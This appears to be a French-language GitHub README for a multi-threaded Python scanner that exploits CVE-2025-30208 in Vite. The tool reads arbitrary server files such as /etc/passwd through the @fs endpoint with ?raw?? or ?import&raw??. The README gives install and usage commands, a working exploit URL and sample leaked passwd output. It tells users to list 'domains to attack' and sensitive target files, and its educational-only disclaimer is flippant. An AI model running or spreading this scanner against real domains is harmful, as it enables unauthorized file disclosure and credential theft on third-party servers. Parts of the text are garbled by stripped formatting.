
CVE-2025-30208 ViteVulnScanner
Yo, voici un script Python multi-threadé badass par keklick1337 pour traquer les domaines vulnérables à la CVE-2025-30208 dans Vite. En gros, il vérifie si on peut choper des fichiers au hasard via l’endpoint @fs avec ?raw?? ou ?import&raw?? — pense à des fuites de /etc/passwd et autres trucs juteux. Il a un filtre anti-faux positifs intelligent pour ne pas perdre ton temps, et des options pour personnaliser le rendu.
<head> et <body> sauf si ça sent le vrai.sourcemappingurl ou export default pour confirmer le bon plan.results_good.txt, results_maybe_good.txt, results_bad.txt).-u si ça te branche.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt : Chemin à tester, un par ligne (ex. /etc/passwd).domains.txt : Domaines à attaquer, un par ligne (ex. example.com).Lance-le comme ça :
python3 CVE-2025-30208.py <domains_file> [options]
<domains_file> : Ta liste de domaines (pas de fichier, pas de scan, logique).-t, --threads : Nombre de threads à lâcher (par défaut : 10).-p, --protocol : Force http ou https, ou laisse vide pour les deux.-u, --urls : Ajoute les URLs vulnérables à la sortie.-o, --output : Nom de base pour les fichiers (par défaut : results).-f, --format : txt pour fichiers séparés ou jsonl pour un seul gros fichier (par défaut : txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt : Les trucs qui sont définitivement niqués (contient sourcemappingurl ou export default).results_maybe_good.txt : Peut-être vulnérable, mais sans preuve flagrante.results_bad.txt : Propres, pas de souci.-u et les URLs sont collées avec une tabulation (\t).results_good.txt avec -u :example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain : Ce que tu as scanné.status : VULNERABLE, MAYBE VULNERABLE ou BAD.url (si -u) : Où c’est foutu.response : Ce que le serveur a recraché.results_good.jsonl :{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake).<head> et <body>, c’est non — le serveur fait juste le con.path_list.txt avec @fs/<path>?raw?? et ?import&raw??.<head> et <body> ? Passe.sourcemappingurl ou export default ? Bingo, GOOD.MAYBE_GOOD.urllib3.disable_warnings()), donc il ne râle pas sur les certificats. Fais gaffe.path_list.txt pour tes cibles — les fichiers sensibles, c’est le vrai morceau.Écoute bien : ce truc est uniquement à des fins éducatives, mon pote. Je ne suis pas responsable si tu fais une connerie, te fais gauler ou fâches quelqu’un avec ça. Utilise-le pour apprendre, pas pour être un connard. Tous les risques sont sur toi, nahuy — je suis juste là pour balancer du code.
Des idées ? Un bug trouvé ? Envoie-moi des issues ou des pull requests. Plus de moyens de tuer les faux positifs ou des fonctionnalités de malade ? Faisons de cette bête un truc encore plus méchant.
BAD